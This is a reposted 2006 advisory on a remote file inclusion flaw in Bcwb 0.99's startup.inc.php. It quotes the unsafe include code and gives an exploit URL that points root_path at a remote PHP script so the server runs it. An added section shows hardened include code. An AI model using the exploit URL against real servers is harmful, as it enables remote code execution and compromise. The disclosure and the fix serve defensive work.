Computer Security
[EN] securityvulns.ru



From: ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date: 20.09.2006
Subject: Bcwb 0.99 (root_path) Remote File Include Vulnerability

*******************************************************************************
# Title  :  Bcwb 0.99(root_path)Remote File Include Vulnerability

# Author :   ajann

# Greetz :   shadow and Suskun for host : )

# Exploit;

*******************************************************************************
[File]
startup.inc.php
[/File]

[Code,1]
startup.inc.php Error:


..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..

Key [:] root_path=http://target.com/command.php?

Example:

http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?

# ajann,Turkey
# ...
# I'm not a Hacker!
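
Added example, not part of the original advisory and not Bcwb project code: a hardened form of the include sequence quoted above. It assumes $root_path reaches the script from the request (for instance through register_globals) and that startup.inc.php sits in <root>/include/, as the example URL suggests. BCWB_ENTRY and safe_include() are hypothetical names.

```php
<?php
// Added example: hardened replacement for the include block in startup.inc.php.
// BCWB_ENTRY and safe_include() are hypothetical names, not part of Bcwb.
// Defence in depth in php.ini: register_globals = Off, allow_url_include = Off.

// 1. Refuse direct HTTP requests to this file. Only an entry script that
//    defined the constant beforehand is allowed to pull it in.
if (!defined('BCWB_ENTRY')) {
    http_response_code(403);
    exit('Direct access not permitted');
}

// 2. Compute the base directory on the server, overwriting anything a request
//    may have injected into $root_path.
//    Assumption: this file lives in <root>/include/.
$root_path = realpath(__DIR__ . '/..');
if ($root_path === false) {
    exit('Cannot resolve application root');
}
$root_path .= DIRECTORY_SEPARATOR;

// 3. Include only files whose resolved location is inside the root.
function safe_include($root, $relative)
{
    // realpath() works on the local filesystem only: it returns false for
    // URLs and missing files, and collapses any "../" sequences.
    $full = realpath($root . $relative);
    if ($full === false || strncmp($full, $root, strlen($root)) !== 0) {
        throw new RuntimeException('Blocked include: ' . $relative);
    }
    return include $full;
}

// Same three files as in the advisory, now resolved against a trusted root.
safe_include($root_path, 'include/startup/debug.inc.php');
safe_include($root_path, 'include/startup/common_functions.inc.php');
safe_include($root_path, 'include/lib/data.lib.php');
```

Because the includes run inside safe_include(), top-level variables set by the included files become local to that function; files that rely on globals need explicit `global` declarations or must be included at file scope after the same realpath check.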
